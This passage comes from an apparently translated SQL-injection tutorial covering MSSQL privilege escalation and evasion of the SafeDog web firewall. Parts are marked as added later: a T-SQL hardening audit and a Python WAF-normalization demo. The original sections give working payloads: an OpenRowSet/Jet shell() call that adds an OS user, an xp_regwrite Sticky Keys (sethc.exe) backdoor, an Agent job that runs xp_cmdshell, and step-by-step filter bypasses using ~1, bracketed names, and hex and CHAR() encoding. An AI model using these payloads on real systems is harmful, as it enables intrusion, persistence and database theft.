!important;white-space: inherit !important;">'Microsoft.Jet.OLEDB.4.0'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">';Databasec:\windows\system32\ias\ias.mdb'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'select shell( net user itpro gmasfm /add )'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);</span></code></span></span></p></li>
   </ol>

To quote our predecessors:

1. Access can call VBS functions and execute arbitrary commands with System privileges.
2. Access will only execute such a command if a certain switch is turned on.
3. That switch lives in the registry.
4. SA has permission to write to the registry.
5. Use SA's registry-write permission to turn that switch on.
6. Call Access's command-execution method to run arbitrary commands as System. By executing SQL commands, the following commands were executed.

0x03 xp_regwrite

Modifying the registry to hijack Sticky Keys (sethc.exe). This does not work against a 2008 database, because the default permissions are very low.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> master</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">..</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_regwrite </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'HKEY_LOCAL_MACHINE'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">Options\sethc.EXE'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Debugger'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'REG_SZ'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'C:\WINDOWS\explorer.exe'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
   </ol>

0x04 public

Privilege escalation from the public role like this is rare in practice, but it is worth mentioning.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">USE msdb</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_add_job </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@job_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'GetSystemOnSQL'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@enabled</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@description</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'This will give a low privileged user access to</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">xp_cmdshell'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@delete_level</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_add_jobstep </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@job_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'GetSystemOnSQL'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@step_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'Exec my sql'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@subsystem</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'TSQL'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@command</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'exec master..xp_execresultset N''select ''''exec</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_add_jobserver </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@job_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'GetSystemOnSQL'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@server_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'SERVER_NAME'</span></code></span></span></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">EXEC sp_start_job </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@job_name</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'GetSystemOnSQL'</span></code></span></span></p></li>
   </ol>

MSSQL's many stored procedures are the key to exploitation. There are surely many more that have not been brought up and that you need to discover yourself; for example, when you are up against IIS 6, cannot get a shell, and have an upload that lets you traverse directories, try xp_create_subdir to create a malformed directory that triggers the parsing flaw.
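As an added example that is not from the original article, here is a T-SQL audit a DBA can run to see whether the preconditions for the escalation paths in 0x01 to 0x04 are present on an instance, and how to switch the relevant server options off. All option, view and role names are standard SQL Server objects; the instance is assumed to be SQL Server 2005 or later.

```sql
-- Added hardening audit (not part of the original article). Run as a login that can read
-- sys.configurations, sys.server_role_members and msdb; the remediation at the end needs sysadmin.

-- 1. Server-level options the techniques above depend on:
--    'Ole Automation Procedures'  -> sp_oacreate / sp_oamethod (0x01)
--    'Ad Hoc Distributed Queries' -> OpenRowSet against the Jet provider (0x02)
--    'xp_cmdshell'                -> the Agent job payload in 0x04
--    value_in_use = 1 means the feature is currently switched on.
SELECT name,
       CAST(value_in_use AS int) AS value_in_use,
       CASE WHEN CAST(value_in_use AS int) = 1 THEN 'ENABLED - review' ELSE 'disabled' END AS status
FROM sys.configurations
WHERE name IN ('Ole Automation Procedures', 'Ad Hoc Distributed Queries', 'xp_cmdshell');

-- 2. Members of sysadmin: these logins can call xp_regwrite and therefore reach the
--    Jet SandBoxMode key (0x02) and the IFEO Debugger key for sethc.exe (0x03).
--    Every application login that shows up here is a finding.
SELECT sp.name AS login_name, sp.type_desc
FROM sys.server_role_members rm
JOIN sys.server_principals r  ON r.principal_id  = rm.role_principal_id
JOIN sys.server_principals sp ON sp.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 3. msdb role members who may create and start Agent jobs with sp_add_job /
--    sp_add_jobstep / sp_start_job (0x04). SQLAgentUserRole is already sufficient.
USE msdb;
SELECT dp.name AS member_name, r.name AS msdb_role
FROM sys.database_role_members drm
JOIN sys.database_principals r  ON r.principal_id  = drm.role_principal_id
JOIN sys.database_principals dp ON dp.principal_id = drm.member_principal_id
WHERE r.name IN ('SQLAgentUserRole', 'SQLAgentReaderRole', 'SQLAgentOperatorRole');

-- 4. Remediation for the server options (sysadmin required). Disabling these does not
--    remove the extended procedures, it stops them from executing.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

Anything returned by query 2 or 3 for a web application's login should be removed from the role; the application only needs rights on its own database.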

Chapter 9: MSSQL, bypassing 安全狗 (SafeDog)

0x00 Introduction

Bypassing is nothing more than the methods covered in the previous MySQL installment, applied flexibly. It is worth noting that MSSQL is usually paired with ASP/ASPX on IIS, so one can exploit features of the container and of the scripting language, such as HTTP parameter pollution (HPP) in ASPX or the way IIS handles the % character. Here, however, I will look for ways to bypass on the database side.

0x01 Simple error-based bypass

Test environment: IIS + ASPX + MSSQL + SafeDog for IIS 4.0.2229

A simple test of conditional expressions:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>and</code> not blocked</p></li>
    <li><p><code>and 1</code> blocked</p></li>
    <li><p><code>and -1</code> not blocked</p></li>
    <li><p><code>and -1=-1</code> not blocked</p></li>
    <li><p><code>and ~1</code> not blocked</p></li>
    <li><p><code>and ~1=1</code> blocked</p></li>
    <li><p><code>and ~1=~1</code> not blocked</p></li>
   </ol>

Roughly speaking, SafeDog is not very sensitive to negative numbers, nor to boolean values produced by arithmetic operations.

Once the and clause gets past the filter, basic information can be extracted through error messages; db_name(), user and @@version can all be used directly without being blocked, at least with this version of SafeDog.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>and @@version&gt;~1</code></p></li>
    <li><p><code>and (user|1)&gt;-1</code></p></li>
    <li><p><code>and (db_name()|1)&gt;.1</code></p></li>
   </ol>

Let's try to bypass it directly using some MSSQL features. The statement for extracting table names:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>and ~1=(select top 1 name from sysobjects where xtype='u' and name!='info');--</code> blocked</p></li>
    <li><p><code>and ~1=(select top 1 name from);--</code> not blocked</p></li>
    <li><p><code>and ~1=(select top 1 name from 1);--</code> blocked</p></li>
    <li><p><code>and ~1=(select top 1 name from a);--</code> blocked</p></li>
    <li><p><code>and ~1=(select top 1 name from !);--</code> not blocked</p></li>
   </ol>

So what SafeDog blocks here is a string or numeric token following from. All we need is a symbol to wrap that token in, and in MSSQL the symbols that can wrap table and database names are [].
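As an added defensive illustration (not part of the original article), the following Python models the two blind spots described above: a signature that matches raw text misses `~1`/`-1` when only `1` is blocked, and misses `[sysobjects]` when only `sysobjects` is blocked, whereas normalizing the input first (unwrapping `[...]`, stripping unary operators, replacing literals) closes both gaps without flagging an ordinary query. The rule sets, the benign query and the probe list are constructed for this example from the page's own test strings; none of it is SafeDog's code.

```python
import re

# Constructed samples: the probe strings this page reports against SafeDog 4.0.2229,
# paired with whether the page says SafeDog blocked them (True = blocked).
PAGE_PAYLOADS = [
    ("and 1", True),
    ("and -1", False),
    ("and -1=-1", False),
    ("and ~1", False),
    ("and ~1=1", True),
    ("and ~1=~1", False),
    ("and @@version>~1", False),
    ("and (user|1)>-1", False),
    ("and (db_name()|1)>.1", False),
    ("and ~1=(select top 1 name from sysobjects where xtype='u');--", True),
    ("and ~1=(select top 1 name from [sysobjects]);--", False),
]

# A benign query an application might legitimately send; a good rule must leave it alone.
BENIGN = "select name from users where id = 5 and active = 1"

# Literal signatures in the spirit of what the page observes: "and <digit>" and
# "from <bare identifier>".  They match raw text, so any decoration of the literal
# (~1, -1, .1) or of the identifier ([sysobjects]) slips past them.
NAIVE_RULES = {
    "and-literal": re.compile(r"\band\s+\d", re.I),
    "from-ident": re.compile(r"\bfrom\s+[a-z_]\w*", re.I),
}


def naive_detect(text: str) -> list[str]:
    """Names of the raw-text signatures that fire on the input."""
    return [name for name, rx in NAIVE_RULES.items() if rx.search(text)]


def normalize(text: str) -> str:
    """Canonicalize T-SQL-like input so equivalent spellings compare equal.

    The steps mirror what the engine itself does: [ident] names the same object
    as ident; ~1, -1 and .1 are all numeric expressions; and one number or string
    literal is as good as another to a signature, so they become N and S.
    """
    s = text.lower()
    s = re.sub(r"\[\s*([^\]]+?)\s*\]", r"\1", s)      # [sysobjects] -> sysobjects
    s = re.sub(r"\s+", " ", s).strip()                 # collapse whitespace
    # Drop unary ~ - + and a bare leading dot in front of a number, but only when
    # they are not binary operators (i.e. not preceded by an operand or ')').
    s = re.sub(r"(?<![\w)])[~\-+.]+(?=\d)", "", s)
    s = re.sub(r"\b\d+(?:\.\d+)?\b", "N", s)           # numeric literal -> N
    s = re.sub(r"'[^']*'", "S", s)                     # string literal -> S
    return s


# Rules written against the normalized form.
NORMALIZED_RULES = {
    "and-literal": re.compile(r"\band N\b"),                    # and 1 / and -1 / and ~1
    "and-tautology": re.compile(r"\band N ?[=<>!]{1,2} ?N\b"),  # and 1=1 / and ~1=~1
    "and-sysfunc-compare": re.compile(                          # and @@version>~1, and (user|1)>-1
        r"\band \(?(?:@@\w+|user|db_name\(\))\|?N?\)? ?[=<>!]{1,2} ?N\b"),
    "catalog-read": re.compile(r"\bfrom (?:sysobjects|syscolumns|sys\.\w+)\b"),
}


def normalized_detect(text: str) -> list[str]:
    """Names of the signatures that fire after normalization."""
    s = normalize(text)
    return [name for name, rx in NORMALIZED_RULES.items() if rx.search(s)]


def coverage() -> dict[str, int]:
    """How many of the page's probes each approach flags, plus benign false positives."""
    return {
        "probes": len(PAGE_PAYLOADS),
        "naive_flagged": sum(1 for p, _ in PAGE_PAYLOADS if naive_detect(p)),
        "normalized_flagged": sum(1 for p, _ in PAGE_PAYLOADS if normalized_detect(p)),
        "naive_benign_fp": int(bool(naive_detect(BENIGN))),
        "normalized_benign_fp": int(bool(normalized_detect(BENIGN))),
    }


if __name__ == "__main__":
    for payload, blocked in PAGE_PAYLOADS:
        print(f"{'blocked' if blocked else 'passed ':8} | {normalize(payload):50} | "
              f"naive={naive_detect(payload)} normalized={normalized_detect(payload)}")
    print(coverage())
```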

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>and ~1=(select top 1 name from [sysobjects]);--</code></p></li>
   </ol>

The bracketed form is indeed not blocked. Let's keep testing further along the statement:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>and ~1=(select top 1 name from [sysobjects] where xtype='u');--</code> blocked</p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">~</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> top </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> name </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">[</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">sysobjects</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">]</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> xtype</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=);--</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">不拦截</span></code></span></span></p></li>
   </ol>

The fix is simple: in MSSQL we can use CHAR() and hex literals to encode our table names.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>and ~1=(select top 1 name from [sysobjects] where xtype=0x75);--</code></p></li>
   </ol>

That basically achieves our goal of extracting the first table name. To extract the other table names, testing shows that again only the quote character is being blocked, so the same method gets around it.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>and ~1=(select top 1 name from [sysobjects] where xtype=0x75 and name not in (CHAR(105)%2BCHAR(110)%2BCHAR(102)%2BCHAR(111),CHAR(97)%2BCHAR(100)%2BCHAR(109)%2BCHAR(105)%2BCHAR(110)));</code></p></li>
   </ol>

There is actually another way to enumerate table names, via INFORMATION_SCHEMA, but SafeDog has a setting that blocks this keyword outright. It is not enabled by default, which is worth mentioning in passing.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1 and ~1=(select top 1 table_name from [INFORMATION_SCHEMA].[TABLES] where table_name not in (char(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)));--</code></p></li>
   </ol>

0x02 A simple UNION bypass

union/!1113/

UNION injection feels like a very simple bypass process, because SafeDog's rules lump MySQL and MSSQL together.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>union    not blocked</code></p></li>
    <li><p><br></p></li>
    <li><p><code>union select    blocked</code></p></li>
    <li><p><br></p></li>
